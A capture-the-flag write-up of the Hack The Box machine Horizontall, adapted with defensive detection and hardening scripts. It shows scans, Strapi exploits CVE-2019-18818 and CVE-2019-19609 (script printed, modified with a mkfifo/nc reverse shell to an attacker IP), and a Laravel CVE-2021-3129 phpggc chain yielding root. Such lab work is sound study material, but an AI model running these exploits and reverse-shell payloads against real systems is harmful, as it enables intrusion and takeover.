Disclaimer
The host attacked in this article was legitimately authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the penetration approach in this article for any illegal purpose. I take no responsibility for any consequences arising from that, nor for any misuse or damage caused.
Service detection
┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.11.105
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-02 08:48 EST
Nmap scan report for 10.10.11.105
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visiting port 80 redirects to a domain called horizontall.htb.
First add this domain to /etc/hosts:
echo "10.10.11.105 horizontall.htb" >> /etc/hosts
Directory brute-forcing
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://horizontall.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/horizontall.htb/-_21-12-02_09-01-00.txt
Error Log: /root/dirsearch/logs/errors-21-12-02_09-01-00.log
Target: http://horizontall.htb/
[09:01:01] Starting:
[09:01:10] 301 - 194B - /js -> http://horizontall.htb/js/
[09:01:11] 400 - 182B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[09:01:56] 400 - 182B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[09:02:01] 301 - 194B - /css -> http://horizontall.htb/css/
[09:02:06] 200 - 4KB - /favicon.ico
[09:02:11] 301 - 194B - /img -> http://horizontall.htb/img/
[09:02:15] 403 - 580B - /js/
[09:02:17] 200 - 901B - /index.html
Only a few folders; nothing useful found.
Vhost brute-forcing
I was stuck here for a long time and couldn't find anything useful. Later I looked at the forum for hints, and someone had commented that the subdomain might have something.
Let's try brute-forcing vhosts with gobuster.
First download this wordlist locally.
┌──(root㉿kali)-[~/htb/Horizontall]
└─# gobuster vhost -u horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/02 23:28:43 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
===============================================================
2021/12/02 23:35:06 Finished
===============================================================
Found an exploitable subdomain: api-prod.horizontall.htb
Edit /etc/hosts again, replacing
10.10.11.105 horizontall.htb
with
10.10.11.105 api-prod.horizontall.htb
Now we can open api-prod.horizontall.htb in the browser.
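From the defender's side, a vhost brute-force like the gobuster run above shows up in the web server's access log as one client cycling through many different Host headers in a short time, with most of them answered by the catch-all server block. The script below is an added example written for this post, not part of the original write-up or of gobuster; it assumes an nginx log_format that records $host (given in the comment) and runs over a constructed sample log in which 10.10.14.16 sends 25 distinct Host values in 25 seconds.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed nginx log format (not the box's real configuration):
#   log_format vhost '$remote_addr [$time_local] "$host" "$request" $status';
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<host>[^"]*)" "(?P<request>[^"]*)" (?P<status>\d{3})$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "time": ts, "host": m.group("host"),
            "status": int(m.group("status"))}


def detect_vhost_bruteforce(lines, window=timedelta(seconds=60), threshold=20):
    """Return {client_ip: max_distinct_hosts} for every client that requested more than
    `threshold` distinct Host values inside some `window`-long sliding interval."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append((rec["time"], rec["host"]))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):
            # slide the left edge forward until the interval fits in the window
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({h for _, h in events[start:end + 1]}))
        if best > threshold:
            flagged[ip] = best
    return flagged


def build_sample_log():
    """Constructed sample: one ordinary visitor and one wordlist-driven scanner."""
    base = datetime(2021, 12, 2, 23, 28, 43)  # constructed, mirrors the scan time above
    fmt = "%d/%b/%Y:%H:%M:%S +0000"
    lines = []
    for i, host in enumerate(["horizontall.htb", "api-prod.horizontall.htb"]):
        t = (base + timedelta(minutes=i)).strftime(fmt)
        lines.append(f'10.10.14.5 [{t}] "{host}" "GET / HTTP/1.1" 200')
    words = ["www", "mail", "ftp", "dev", "test", "api", "staging", "admin", "beta", "app",
             "portal", "blog", "shop", "cdn", "m", "static", "vpn", "ns1", "ns2", "mx",
             "api-prod", "old", "new", "demo", "secure"]
    for i, word in enumerate(words):
        t = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'10.10.14.16 [{t}] "{word}.horizontall.htb" "GET / HTTP/1.1" 200')
    return lines


if __name__ == "__main__":
    for ip, n in detect_vhost_bruteforce(build_sample_log()).items():
        print(f"{ip}: {n} distinct Host headers within one window")
```

The threshold and window are starting points; on a host that legitimately serves many names, raise the threshold or key the count on names that do not exist in the nginx configuration.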
Brute-forcing the subdomain
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://api-prod.horizontall.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/api-prod.horizontall.htb/-_21-12-03_00-35-14.txt
Error Log: /root/dirsearch/logs/errors-21-12-03_00-35-14.log
Target: http://api-prod.horizontall.htb/
[00:35:15] Starting:
[00:35:24] 400 - 182B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:35:35] 200 - 854B - /ADMIN
[00:35:35] 200 - 854B - /Admin/login/
[00:35:35] 200 - 854B - /Admin
[00:35:40] 400 - 67B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:35:45] 200 - 854B - /admin
[00:35:47] 200 - 854B - /admin/_logs/access_log
[00:35:47] 200 - 854B - /admin/.config
[00:35:47] 200 - 854B - /admin/.htaccess
[00:35:47] 200 - 854B - /admin/?/login
[00:35:47] 200 - 854B - /admin/
[00:35:47] 200 - 854B - /admin/_logs/error-log
[00:35:47] 200 - 854B - /admin/access_log
[00:35:47] 200 - 854B - /admin/admin-login
[00:35:47] 200 - 854B - /admin/_logs/access-log
[00:35:47] 200 - 854B - /admin/admin
[00:35:47] 200 - 854B - /admin/_logs/error_log
[00:35:47] 200 - 854B - /admin/admin/login
[00:35:47] 200 - 854B - /admin/adminLogin
[00:35:47] 200 - 854B - /admin/backup/
[00:35:48] 200 - 854B - /admin/backups/
[00:35:48] 200 - 854B - /admin/controlpanel
[00:35:48] 200 - 854B - /admin/db/
[00:35:48] 200 - 854B - /admin/error_log
[00:35:48] 200 - 854B - /admin/default
[00:35:48] 200 - 854B - /admin/FCKeditor
[00:35:48] 200 - 854B - /admin/home
[00:35:48] 200 - 854B - /admin/index
[00:35:48] 200 - 854B - /admin/index.html
[00:35:48] 200 - 854B - /admin/js/tiny_mce
[00:35:48] 200 - 854B - /admin/login
[00:35:48] 200 - 854B - /admin/js/tiny_mce/
[00:35:48] 200 - 854B - /admin/js/tinymce/
[00:35:48] 200 - 854B - /admin/js/tinymce
[00:35:48] 200 - 854B - /admin/cp
[00:35:48] 200 - 854B - /admin/account
[00:35:48] 200 - 854B - /admin/dumper/
[00:35:48] 200 - 854B - /admin/log
[00:35:48] 200 - 854B - /admin/logs/
[00:35:48] 200 - 854B - /admin/logs/error_log
[00:35:48] 200 - 854B - /admin/logs/access_log
[00:35:48] 200 - 854B - /admin/mysql/
[00:35:48] 200 - 854B - /admin/logs/access-log
[00:35:48] 200 - 854B - /admin/phpMyAdmin
[00:35:48] 200 - 854B - /admin/logs/error-log
[00:35:48] 200 - 854B - /admin/admin_login
[00:35:48] 200 - 854B - /admin/phpMyAdmin/
[00:35:48] 200 - 854B - /admin/manage
[00:35:48] 200 - 854B - /admin/pMA/
[00:35:48] 200 - 854B - /admin/pma/
[00:35:48] 200 - 854B - /admin/portalcollect.php?f=http://xxx&t=js
[00:35:48] 200 - 854B - /admin/phpmyadmin/
[00:35:48] 200 - 854B - /admin/scripts/fckeditor
[00:35:48] 200 - 854B - /admin/release
[00:35:48] 200 - 854B - /admin/sysadmin/
[00:35:48] 200 - 854B - /admin/private/logs
[00:35:48] 200 - 854B - /admin/sqladmin/
[00:35:48] 200 - 854B - /admin/sxd/
[00:35:48] 200 - 854B - /admin/signin
[00:35:48] 200 - 854B - /admin/tinymce
[00:35:48] 200 - 854B - /admin/tiny_mce
[00:35:49] 200 - 854B - /admin/web/
[00:36:20] 400 - 182B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:36:38] 200 - 1KB - /favicon.ico
[00:36:46] 200 - 413B - /index.html
[00:37:17] 200 - 507B - /reviews
[00:37:17] 200 - 121B - /robots.txt
There is an admin backend.
Looking at the page source, this backend is built with a CMS called Strapi.
CVE-2019-18818
We search Google for exploit scripts for this CMS and pick this exp.
After downloading it locally, run the attack.
┌──(root㉿kali)-[~/htb/Horizontall]
└─# python3 exp.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI
Now we have login credentials for the CMS: admin:SuperStrongPassword1
Also keep this token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI
CVE-2019-19609
After logging into the backend, the dashboard shows the CMS version: Strapi v3.0.0-beta.17.4
Searching Google for a usable exp for this version, we find this attack script.
Download it locally.
Run the following payload:
python3 exp2.py "http://api-prod.horizontall.htb" "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI" "id" "10.10.14.16"
┌──(root㉿kali)-[~/htb/Horizontall]
└─# python3 exp2.py "http://api-prod.horizontall.htb" "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM4NzY5NTcyLCJleHAiOjE2NDEzNjE1NzJ9.4rETx89O06Mqa1fWj4uwUVhqK9krXg6dP4BzfudH4mI" "id" "10.10.14.16"
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
[+] Successful operation!!!
listening on [any] 9999 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 45258
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
The third parameter runs a single command; as seen above, the current webshell user is strapi.
But this shell only runs one command per invocation, which is awkward.
Now that we know the exploit can execute system commands, we modify it directly into a reverse shell.
# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609
#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
import requests, sys, os, socket

logoType = ('''
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
''')

if __name__ == '__main__':
    # Parameter checking
    if len(sys.argv) != 5:
        print(logoType)
        print("[!] Some of these parameters are missing.")
        print('''
Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])
    # Exploit run
    else:
        # Parameters
        url = sys.argv[1]
        token = sys.argv[2]
        command = sys.argv[3]
        lhost = sys.argv[4]
        lport = 9999
        s = requests.session()
        r = s.post(url, verify=False) # SSL == verify=True
        headersData = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'Authorization': "Bearer %s" % token
        }
        postData = {
            "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
        }
        print(logoType)
        os.system("nc -nvlp 9999 &")
        try:
            print("[+] Successful operation!!!")
            r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True
            # Content print
            print(r.text)
        except:
            print("[!] An error occurred, try again.")
            sys.exit(1)
Change the value in postData from
"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)
to:
"plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
and save.
Start a listener and run the attack.
We receive a full reverse shell.
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 58760
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi
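The process list later in this post shows why this works: the plugin name from the install request ends up inside sh -c strapi "install" "<name>", so any command substitution in the name is executed by the shell. The following is an added example for this post, not Strapi's code and not the exploit author's; it uses echo as a stand-in for the strapi binary so the effect is visible offline, and puts the unsafe shell-string pattern next to the hardened form (argv list, no shell, plus an allowlist). The allowlist regex is an assumption chosen for illustration, not Strapi's own validation rule, and the injected name carries only a harmless echo in place of the reverse shell.

```python
import re
import subprocess

# Assumed allowlist for plugin names; illustration only, not Strapi's real rule.
PLUGIN_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,63}$")

# Shape of the name the exploit above submits, with a harmless command
# substitution standing in for the reverse-shell payload.
INJECTED_NAME = "documentation && $(echo INJECTED)"


def run_unsafe(plugin):
    """Vulnerable pattern: the caller-controlled name is spliced into a shell string.
    `echo` stands in for `strapi`. Because the string is parsed by `sh -c`, the
    $(...) inside the name is executed and only its result reaches the program."""
    return subprocess.run(f'echo install "{plugin}"', shell=True,
                          capture_output=True, text=True).stdout


def run_argv_no_shell(plugin):
    """First layer of the fix: pass the name as its own argv element with no shell.
    Metacharacters arrive at the program as literal text and are never evaluated."""
    return subprocess.run(["echo", "install", plugin],
                          capture_output=True, text=True).stdout


def is_valid_plugin_name(plugin):
    """Second layer: accept only names that look like a package name."""
    return PLUGIN_NAME_RE.match(plugin) is not None


def safe_install_argv(plugin):
    """Argv a hardened installer would hand to subprocess.run (shell=False):
    the name is validated first and passed as a separate argument."""
    if not is_valid_plugin_name(plugin):
        raise ValueError(f"rejected plugin name: {plugin!r}")
    return ["strapi", "install", plugin]


if __name__ == "__main__":
    print("unsafe, benign name :", run_unsafe("documentation").rstrip())
    print("unsafe, injected    :", run_unsafe(INJECTED_NAME).rstrip())
    print("argv, injected      :", run_argv_no_shell(INJECTED_NAME).rstrip())
    print("allowlist accepts   :", is_valid_plugin_name("documentation"))
    print("allowlist accepts   :", is_valid_plugin_name(INJECTED_NAME))
```

Both layers matter: the argv form alone stops the shell from interpreting the name, and the allowlist alone stops junk from reaching the package manager, which may have its own interpretation of special characters.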
Privilege escalation
List all TCP connections
netstat -nap|grep tcp
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1845/node /usr/bin/
tcp 0 23 10.10.11.105:35982 10.10.14.16:4242 ESTABLISHED 2825/nc
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
List all processes
ps -aux |more
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
strapi 1798 0.0 0.3 76648 7324 ? Ss 05:40 0:00 /lib/systemd/systemd --user
strapi 1834 0.0 2.0 610056 40608 ? Ssl 05:40 0:00 PM2 v4.5.6: God Daemon (/opt/strapi/.pm2)
strapi 1845 0.4 3.5 910600 72176 ? Ssl 05:40 0:03 node /usr/bin/strapi
strapi 2801 0.2 2.0 804984 40656 ? Sl 05:50 0:00 npm
strapi 2819 0.0 0.0 4640 932 ? S 05:50 0:00 sh -c strapi "install" "documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
strapi 2820 0.0 0.0 4640 104 ? S 05:50 0:00 sh -c strapi "install" "documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
strapi 2823 0.0 0.0 6328 748 ? S 05:50 0:00 cat /tmp/f
strapi 2824 0.0 0.0 4640 816 ? S 05:50 0:00 /bin/sh -i
strapi 2825 0.0 0.1 15724 2184 ? S 05:50 0:00 nc 10.10.14.16 4242
strapi 2844 0.0 0.4 38980 9768 ? S 05:51 0:00 python3 -c __import__('pty').spawn('/bin/bash')
strapi 2845 0.0 0.2 21364 5152 pts/0 Ss 05:51 0:00 /bin/bash
strapi 2930 0.0 0.1 38384 3508 pts/0 R+ 05:53 0:00 ps -aux
strapi 2931 0.0 0.0 8424 932 pts/0 S+ 05:53 0:00 more
From the process list and local connections, three services are listening only on 127.0.0.1.
3306 is the database, which is normal.
1337 is the Strapi instance we came in through; it is also reachable externally via the subdomain.
That leaves port 8000, whose service is unknown; let's tunnel to it and take a look.
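The process list above is also a good detection source: the fifo-and-netcat pipeline, an interactive sh with no controlling TTY, an outbound nc to an IP and port, and the pty-spawn upgrade are all visible in the COMMAND column. The script below is an added example for this post, not a tool from the write-up; it runs a subset of the listing above (embedded as the sample) through a few regex rules and reports which PID matched which rule. The rules are assumptions chosen for illustration and will need tuning on a real host.

```python
import re

# Subset of the `ps -aux` listing above; the header line is kept so the parser must skip it.
SAMPLE_PS = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
strapi 1798 0.0 0.3 76648 7324 ? Ss 05:40 0:00 /lib/systemd/systemd --user
strapi 1834 0.0 2.0 610056 40608 ? Ssl 05:40 0:00 PM2 v4.5.6: God Daemon (/opt/strapi/.pm2)
strapi 1845 0.4 3.5 910600 72176 ? Ssl 05:40 0:03 node /usr/bin/strapi
strapi 2801 0.2 2.0 804984 40656 ? Sl 05:50 0:00 npm
strapi 2819 0.0 0.0 4640 932 ? S 05:50 0:00 sh -c strapi "install" "documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4242 >/tmp/f)"
strapi 2823 0.0 0.0 6328 748 ? S 05:50 0:00 cat /tmp/f
strapi 2824 0.0 0.0 4640 816 ? S 05:50 0:00 /bin/sh -i
strapi 2825 0.0 0.1 15724 2184 ? S 05:50 0:00 nc 10.10.14.16 4242
strapi 2844 0.0 0.4 38980 9768 ? S 05:51 0:00 python3 -c __import__('pty').spawn('/bin/bash')
strapi 2845 0.0 0.2 21364 5152 pts/0 Ss 05:51 0:00 /bin/bash
strapi 2930 0.0 0.1 38384 3508 pts/0 R+ 05:53 0:00 ps -aux
"""

PS_FIELDS_BEFORE_COMMAND = 10  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME

# Assumed indicator rules (name, pattern over the COMMAND column).
RULES = [
    ("fifo-reverse-shell", re.compile(r"mkfifo\s+\S+.*\b(nc|ncat|netcat)\b")),
    ("interactive-shell-no-tty", re.compile(r"(^|[\s/])(sh|bash)\s+-i\b")),
    ("netcat-outbound", re.compile(r"\b(nc|ncat|netcat)\s+(-\S+\s+)*\d{1,3}(\.\d{1,3}){3}\s+\d+\b")),
    ("pty-upgrade", re.compile(r"pty.*spawn\(")),
]


def parse_ps_line(line):
    """Split one `ps -aux` row; returns None for the header or malformed rows."""
    parts = line.split(None, PS_FIELDS_BEFORE_COMMAND)
    if len(parts) <= PS_FIELDS_BEFORE_COMMAND or not parts[1].isdigit():
        return None
    return {"user": parts[0], "pid": int(parts[1]), "tty": parts[6],
            "command": parts[PS_FIELDS_BEFORE_COMMAND]}


def find_reverse_shell_indicators(ps_output):
    """Return a sorted list of (pid, rule_name) for every rule a process matches.
    The interactive-shell rule only fires when the process has no controlling TTY,
    which is what a shell spawned from a web process looks like."""
    hits = set()
    for line in ps_output.splitlines():
        proc = parse_ps_line(line)
        if proc is None:
            continue
        for name, pattern in RULES:
            if not pattern.search(proc["command"]):
                continue
            if name == "interactive-shell-no-tty" and proc["tty"] != "?":
                continue
            hits.add((proc["pid"], name))
    return sorted(hits)


if __name__ == "__main__":
    for pid, rule in find_reverse_shell_indicators(SAMPLE_PS):
        print(f"pid {pid}: {rule}")
```

In practice this runs against live `ps` output or an EDR process-creation feed rather than a pasted listing; the parent-child chain (node, then sh -c, then sh -i and nc) is the strongest signal and is worth adding once process parent IDs are available.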
chisel tunnel
Kali side
┌──(root㉿kali)-[~/chisel]
└─# ./chisel server -p 8888 --reverse
2021/12/06 01:19:43 server: Reverse tunnelling enabled
2021/12/06 01:19:43 server: Fingerprint RrZsQFbor2kqfDlA6y9yeOs9BiezohKLhkENPxg4P9A=
2021/12/06 01:19:43 server: Listening on http://0.0.0.0:8000
2021/12/06 01:20:59 server: session#1: tun: proxy#R:1337=>localhost:1337: Listening
Target side
strapi@horizontall:/tmp$ ./chisel client 10.10.14.16:8888 R:8000:localhost:8000
<hisel client 10.10.14.16:8000 R:1337:localhost:1337
2021/12/06 06:22:21 client: Connecting to ws://10.10.14.16:8000
2021/12/06 06:22:24 client: Connected (Latency 386.283845ms)
Now the service on that port is listening locally.
┌──(root㉿kali)-[~]
└─# netstat -ano |grep 8000
tcp6 0 0 :::8000 :::* LISTEN off (0.00/0/0)
Open localhost:8000 in the browser.
It is a Laravel landing page showing the version: Laravel v8 (PHP v7.4.18)
Brute-force this site to see what files and directories it has.
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://localhost:8000
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/localhost-8000/_21-12-06_01-38-51.txt
Error Log: /root/dirsearch/logs/errors-21-12-06_01-38-51.log
Target: http://localhost:8000/
[01:38:52] Starting:
[01:39:14] 200 - 603B - /.htaccess
[01:39:14] 200 - 17KB - /.htaccess/
[01:39:48] 405 - 547KB - /_ignition/execute-solution
[01:40:51] 200 - 1KB - /web.config
CVE-2021-3129
Looking at the /_ignition/execute-solution path and searching Google together with the page information, CVE-2021-3129 is likely present.
I found this exp on GitHub.
Following the exploit's attack steps, first install phpggc on Kali:
sudo apt install phpggc
Compile the command id into the file /tmp/exploit.phar
┌──(root㉿kali)-[~/htb/Horizontall/phpggc]
└─# php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
A phar file has now been generated in the tmp folder:
┌──(root㉿kali)-[~/htb/Horizontall/phpggc]
└─# ll /tmp/exploit.phar
-rw-r--r-- 1 root root 514 12月 6 02:33 /tmp/exploit.phar
Run the attack:
┌──(root㉿kali)-[~/htb/Horizontall]
└─# python3 exp3.py http://localhost:8000/ /tmp/exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------
+ Logs cleared
The command output is echoed back successfully, and it is running as root.
The above confirms the vulnerability and arbitrary command execution; now compile a reverse shell.
┌──(root㉿kali)-[~/htb/Horizontall/phpggc]
└─# php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4444 >/tmp/f'
Start a listener:
nc -lnvp 4444
Run the attack again and receive a root reverse shell.
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.105] 60848
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
Summary
This was my first active HTB machine, and on and off it took quite a long time. The vhost and the tunnel were the two key steps; without them there was no way forward, and I only thought of them after reading the author's hint on the forum.
Every setback is experience; keep at it.